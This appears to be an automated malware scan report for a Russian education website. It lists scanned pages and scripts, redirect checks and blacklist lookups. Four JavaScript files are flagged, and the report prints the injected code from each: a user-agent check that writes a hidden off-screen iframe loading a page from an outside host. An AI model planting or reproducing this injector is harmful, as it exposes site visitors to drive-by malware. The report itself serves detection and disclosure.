Scanned pages/files
Request | Server response | Status |
http://www.ul-ucheba.ru/ | 200 OK Content-Length: 69919 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 96962 Content-Type: application/javascript | clean |
http://www.ul-ucheba.ru/media/system/js/core.js | 200 OK Content-Length: 5384 Content-Type: application/javascript | clean |
http://www.ul-ucheba.ru/media/system/js/caption.js | 200 OK Content-Length: 1329 Content-Type: application/javascript | clean |
http://www.ul-ucheba.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 238931 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)||(/^ï¿¥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})*(\.[0-9]{0,2})?|[1-9]{1}\d*(\.[0-9]{0,2})?|0(\.[0-9]{0,2})?|(\.[0-9]{1,2})?)$/).test(a.get("value")); }}); Antivirus reports:
| ||
http://www.ul-ucheba.ru/modules/mod_zstagcloud/js/swfobject.js | 200 OK Content-Length: 10359 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://www.ul-ucheba.ru/modules/mod_fpss/includes/js/jquery.fpss.js | 200 OK Content-Length: 5499 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://ul-ucheba.ru/modules/mod_highlighter_gk4/interface/scripts/engine.js | 200 OK Content-Length: 6828 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk var $this = this; if($this.mouseIsOver == false) { $this.effects1[$this.actual].start('opacity', 0); $this.effects2[$this.actual].start('top', 0,-24); $this.actual++; if($this.actual > $this.items.length-1) $this.actual = 0; $this.effects1[$this.actual].start('opacity', 1); $this.effects2[$this.actual].start('top', 24,0); } } }); GKNewsHighligher.implement(new Options); Antivirus reports:
| ||
http://www.ul-ucheba.ru/index.php | 200 OK Content-Length: 69928 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/news | 200 OK Content-Length: 45135 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/colleges | 200 OK Content-Length: 46944 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/language-courses | 200 OK Content-Length: 45199 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/all-questions | 200 OK Content-Length: 48148 Content-Type: text/html | clean |
http://www.ul-ucheba.ru/law-questions | 200 OK Content-Length: 44264 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ul-ucheba.ru
Result:
GET / HTTP/1.1
Host: ul-ucheba.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ul-ucheba.ru
Referer: http://www.google.com/search?q=ul-ucheba.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ul-ucheba.ru
Referer: http://www.google.com/search?q=ul-ucheba.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ul-ucheba.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ul-ucheba.ru/
Result: ul-ucheba.ru is not infected or malware details are not published yet.
Result: ul-ucheba.ru is not infected or malware details are not published yet.